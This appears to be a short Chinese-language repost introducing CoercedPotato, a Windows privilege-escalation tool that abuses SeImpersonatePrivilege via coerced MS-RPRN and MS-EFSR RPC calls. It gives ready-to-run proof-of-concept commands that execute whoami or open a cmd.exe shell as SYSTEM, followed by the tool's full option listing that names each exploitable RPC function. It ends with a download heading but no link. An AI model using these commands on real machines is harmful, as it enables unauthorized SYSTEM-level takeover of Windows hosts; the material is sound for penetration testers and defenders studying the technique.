工具使用

非常快速POC：.\CoercedPotato.exe -c whoami
交互式shell的PoC：.\CoercedPotato.exe -c cmd.exe

CoercedPotato is an automated tool for privilege escalation exploit using SeImpersonatePrivilege or SeImpersonatePrimaryToken.Usage: .\CoercedPotato.exe [OPTIONS]
Options:  -h,--help                   Print this help message and exit  -c,--command TEXT REQUIRED  Program to execute as SYSTEM (i.e. cmd.exe)  -i,--interface TEXT         Optionnal interface to use (default : ALL) (Possible values : ms-rprn, ms-efsr  -n,--exploitId INT          Optionnal exploit ID (Only usuable if interface is defined)                                -> ms-rprn :                                  [0] RpcRemoteFindFirstPrinterChangeNotificationEx()                                 [1] RpcRemoteFindFirstPrinterChangeNotification()                               -> ms-efsr                                  [0] EfsRpcOpenFileRaw()                                 [1] EfsRpcEncryptFileSrv()                                 [2] EfsRpcDecryptFileSrv()                                 [3] EfsRpcQueryUsersOnFile()                                 [4] EfsRpcQueryRecoveryAgents()                                 [5] EfsRpcRemoveUsersFromFile()                                 [6] EfsRpcAddUsersToFile()                                 [7] EfsRpcFileKeyInfo() # NOT WORKING                                 [8] EfsRpcDuplicateEncryptionInfoFile()                                 [9] EfsRpcAddUsersToFileEx()                                 [10] EfsRpcFileKeyInfoEx() # NOT WORKING                                 [11] EfsRpcGetEncryptedFileMetadata()                                 [12] EfsRpcEncryptFileExSrv()                                 [13] EfsRpcQueryProtectors()                                -f,--force BOOLEAN          Force all RPC functions even if it says 'Exploit worked!' (Default value : false)  --interactive BOOLEAN       Set wether the process should be run within the same shell or open a new window. (Default value : true)

下载地址

信 安 考 证